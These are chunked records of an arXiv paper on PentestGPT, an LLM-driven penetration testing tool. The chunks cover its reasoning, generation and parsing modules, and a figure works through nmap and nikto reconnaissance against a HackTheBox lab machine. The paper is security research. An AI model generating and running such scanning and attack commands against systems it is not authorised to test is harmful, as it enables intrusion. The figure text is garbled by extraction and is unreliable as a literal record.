2308.06782 | 46 | overcomes the memory-loss issue by maintaining a task tree that encompasses the entire penetration testing process. ⷠAfter updating the tree information, a verification step is conducted on the newly updated PTT to ascertain its correctness. This process checks explicitly that only the leaf nodes of the PTT have been modified, aligning with the principle that atomic operations in the penetration testing process should only influence the status of the lowest-level sub-tasks. This step confirms the correctness of the reason- ing process, safeguarding against any potential alterations to the overall tree structure due to hallucination by the LLM. If discrepancies arise, the information is reverted to the LLM for correction and regeneration. ⸠With the updated PTT, the Reasoning Module evaluates the current tree state and pinpoints viable sub-tasks that can serve as candidate steps for further testing. ⹠Finally, the module evaluates the likelihood of these sub-tasks leading to suc- cessful penetration testing outcomes. It then recommends the top task as the output. The expected results of this task are subsequently forwarded to the Generation Module for an in-depth analysis. This is feasible, as demonstrated in the exploratory study, since | 2308.06782#46 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 47 | expected results of this task are subsequently forwarded to the Generation Module for an in-depth analysis. This is feasible, as demonstrated in the exploratory study, since LLMs, particularly GPT-4, can identify potential vulnerabilities when provided with system status information. This procedural approach enables the Reasoning Module to address one of the inherent lim- itations of LLMs, precisely their tendency to concentrate solely on the most recent task. Note that in cases where the tester identifies that the correct task is incorrect or not completed in a preferred way, he could also manually revise the PTT through the interactive handle further discussed in Section 5.6. | 2308.06782#47 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 48 | We devise four sets of prompts to sequentially guide the Reasoning Module through the completion of each stage. To bolster the reproducibility of our results, we optimize these prompts further with a technique known as hint gen- eration [39]. From our practical experience, we observe that LLMs are adept at interpreting the tree-structured infor- mation pertinent to penetration testing and can update it accurately in response to test outputs.
# 5.4. Generation Module
The Generation Module translates specific sub-tasks from the Reasoning Module into concrete commands or instructions. Each time a new sub-task is received, a fresh session is initiated in the Generation Module. This strategy effectively isolates the context of the overarching penetration task from the immediate task under execution, enabling the LLM to focus entirely on generating specific commands.
Instead of directly transforming the received sub-task into specific operations, our design employs the CoT strat- egy [36] to partition this process into two sequential steps. This design decision directly addresses the challenges as- sociated with model inaccuracy and hallucination by en- hancing the modelâs reasoning capability. In particular, ⺠upon the receipt of a concise sub-task from the Reason- ing Module, the Generation Module begins by expanding it into a sequence of detailed steps. Notably, the prompt
10 | 2308.06782#48 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 49 | 10
associated with this sub-task requires the LLM to consider the possible tools and operations available within the testing environment. â» Subsequently, the Generation Module trans- forms each of these expanded steps into precise terminal commands ready for execution or into detailed descriptions of specific Graphical User Interface (GUI) operations to be carried out. This stage-by-stage translation eliminates poten- tial ambiguities, enabling testers to follow the instructions directly and seamlessly. Implementing this two-step process effectively precludes the LLM from generating operations that may not be feasible in real-world scenarios, thereby improving the success rate of the penetration testing proce- dure. | 2308.06782#49 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 50 | By acting as a bridge between the strategic insights provided by the Reasoning Module and the actionable steps required for conducting a penetration test, the Generation Module ensures that high-level plans are converted into precise and actionable steps. This transformation process significantly bolsters the overall efficiency of the penetration testing procedure. An Illustrative Example. We utilize a real-world running example to illuminate how the Reasoning Module and the Generation Module collaboratively operate to complete pen- etration testing tasks. Figure 5 illustrates a single iteration of PENTESTGPT working on the HackTheBox machine Car- rier [40], a medium-difficulty target. As depicted in a-1), the PTT, in natural language format, encodes the testing status, revealing the open ports (21, 22,80) on the target machine. The Reasoning Module is subsequently instructed to identify the available tasks. As highlighted in red, service scanning is the only available task on the leaf node of the PTT. This task is therefore chosen and forwarded to the Generation Module for command generation. The generated command is executed in the testing environment, and the execution result is conveyed to the Reasoning Module to update the PTT. In a-2), the Reasoning Module integrates the | 2308.06782#50 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 51 | is executed in the testing environment, and the execution result is conveyed to the Reasoning Module to update the PTT. In a-2), the Reasoning Module integrates the previous scanning result into the PTT, cross-referencing it with the earlier PTT to update only the leaf nodes. It then looks for the available tasks to execute. In this case, two tasks emerge: scanning the web service on port 80 and checking the SSH service for known vulnerabilities. The LLM evaluates which task is more promising and chooses to investigate the web service, often seen as more vulnerable. This task is passed to the Generation Module. The Generation Module turns this general task into a detailed process, employing nikto [41], a commonly used web scanning script. The iterative process continues until the tester completes the penetration testing task. | 2308.06782#51 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 52 | # 5.5. Parsing Module
The Parsing Module operates as a supportive interface, enabling effective processing of the natural language infor- mation exchanged between the user and the other two core modules. Two needs can primarily justify the existence of this module. First, security testing tool outputs are typically verbose, laden with extraneous details, making it compu- tationally expensive and unnecessarily redundant to feed | 2308.06782#52 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 53 | Reasoning Module Task Tree: 1. Perform reconnaissance tasks b-1) Available Leaf-node Tasks âAvailable Tasks 1. Identify services running on (on-going) 1.1. Scan for open ports on the target machine (completed) = Port 21, 22 and 80 are open. I arte Decided Task Identify services running on open ports. = Port 21, 22 and 80 are open. 1.2. Identify services running on open ports. 2. Perform the testing Cross a-1) Task Tree c-1) Decided Task Generation Module d-1) Command to Execute [Command to Execute Use nmap to determine service versions on open ports. The Execution Outputs e-1) Execution Result map OuEpae r|command is ânmap -sV ~p21,22,80 PORy STATE SERVICE VERSION ' <ip-address>*. 21/tcp filtered ftp 1 22/tcp open ssh OpenSSH 7.6p1 a 1 80/tcp open http Apache 2.4.18 | Service Info: OS: Linux; CPE: Testing Environment with the Target Machine| | \Check t Task Tree: 1. Perform reconnaissance tasks b-2) Available Leaf-node Tasks Available Tasks 1.2... 1. Scan the web port | 2308.06782#53 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 54 | | \Check t Task Tree: 1. Perform reconnaissance tasks b-2) Available Leaf-node Tasks Available Tasks 1.2... 1. Scan the web port 1.2. Identify services running on open ports. contain known vulnerabilities. We Check if the SSH service = FIP filtered, OpenSSH 7.6p1, Apache 2.4.18 ore â! ee 2. Perform the testing 2.1 Scan the web port 2.2 Check if the SSH service contain known vulnerabilities. a-2) Updated Task Tree c-2) Decided Task (Command to Execute Use nikto to scan the target lweb service. The command is ânikto -h <ip-address>*. e-2) Execution Result aKtS Output + Server: Apache/2.4.18 (Ubuntu) L,|+ the anti-clickjacking x-Frame- loptions header is not present. d-2) Command to Execute Generation | 2308.06782#54 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 55 | Figure 5: A demonstration of the task-tree update process on the testing target HTB-Carrier
these extended outputs directly into the LLMs. Second, users without specialized knowledge in the security domain may struggle to extract key insights from security testing out- puts, presenting challenges in summarizing crucial testing information. Consequently, the Parsing Module is essential in streamlining and condensing this information.
and users can always query the reasoning context without making unnecessary changes. If the user believes it nec- essary to update the PTT, they can explicitly instruct the model to update the reasoning context history accordingly. This provides a robust and flexible framework for the user to participate in the decision-making process actively.
the Parsing Module is devised to handle four distinct types of information: (1) user intentions, which are directives provided by the user to dictate the next course of action, (2) security testing tool outputs, which represent the raw outputs generated by an array of security testing tools, (3) raw HTTP web information, which encompasses all raw information derived from HTTP web interfaces, and (4) source codes extracted during the penetration testing process. Users must specify the category of the information they provide, and each category is paired with a set of carefully designed prompts. For source code analysis, we integrate the GPT-4 code interpreter [42] to execute the task.
# 5.6. Active Feedback | 2308.06782#55 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 56 | # 5.6. Active Feedback
While LLMs can produce insightful outputs, their out- comes may sometimes require revisions. To facilitate this, we introduce an interactive handle in PENTESTGPT, known as active feedback, which allows the user to interact directly with the Reasoning Module. A vital feature of this process is that it does not alter the context within the Reasoning Module unless the user explicitly desires to update some information. The reasoning context, including the PTT, is stored as a fixed chunk of tokens. This chunk of tokens is provided to a new LLM session during an active feedback interaction, and users can pose questions regarding them. This ensures that the original session remains unaffected,
# 5.7. Discussion
We explore various design alternatives for PENTEST- GPT to tackle the challenges identified in Exploratory Study. We have experimented with different designs, and here we discuss some key decisions. | 2308.06782#56 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 57 | We explore various design alternatives for PENTEST- GPT to tackle the challenges identified in Exploratory Study. We have experimented with different designs, and here we discuss some key decisions.
Addressing Context Loss with Token Size: a straight- forward solution to alleviate context loss is the employment of LLM models with an extended token size. For instance, GPT-4 provides versions with 8k and 32k token size limits. This approach, however, confronts two substantial chal- lenges. First, even a 32k token size might be inadequate for penetration testing scenarios, as the output of a single testing tool like dirbuster [43] may comprise thousands of tokens. Consequently, GPT-4 with a 32k limit cannot retain the entire testing context. Second, even when the entire conversation history fits within the 32k token boundary, the API may still skew towards recent content, focusing on local tasks and overlooking broader context. These issues guided us in formulating the design for the Reasoning Module and the Parsing Module.
Vector Database to Improve Context Length: Another technique to enhance the context length of LLMs involves a vector database [44], [45]. By transmuting data into vec- tor embeddings, LLMs can efficiently store and retrieve information, practically creating long-term memory. Theo- retically, penetration testing tool outputs could be archived
11 | 2308.06782#57 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 58 | 11
in the vector database. In practice, though, we observe that many results closely resemble and vary in only nuanced ways. This similarity often leads to confused information retrieval. Solely relying on a vector database fails to over- come context loss in penetration testing tasks. Integrating the vector database into the design of PENTESTGPT is an avenue for future research.
Precision in Information Extraction: Precise informa- tion extraction is crucial for conserving token usage and avoiding verbosity in LLMs. Rule-based methods are com- monly employed to extract diverse information. However, rule-based techniques are engineeringly expensive given natural languageâs inherent complexity and the variety of information types in penetration testing. We devise the Parsing Module to manage several general input information types, a strategy found to be both feasible and efficient. of LLMs: LLMs an all- encompassing solution. Present LLMs exhibit flaws, includ- ing hallucination [46] and outdated knowledge. Our miti- gation efforts, such as implementing task tree verification to ward off hallucination, might not completely prevent the Reasoning Module from producing erroneous outcomes. Thus, a human-in-the-loop strategy becomes vital, facilitat- ing the input of necessary expertise and guidance to steer LLMs effectively.
# 6. Evaluation | 2308.06782#58 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
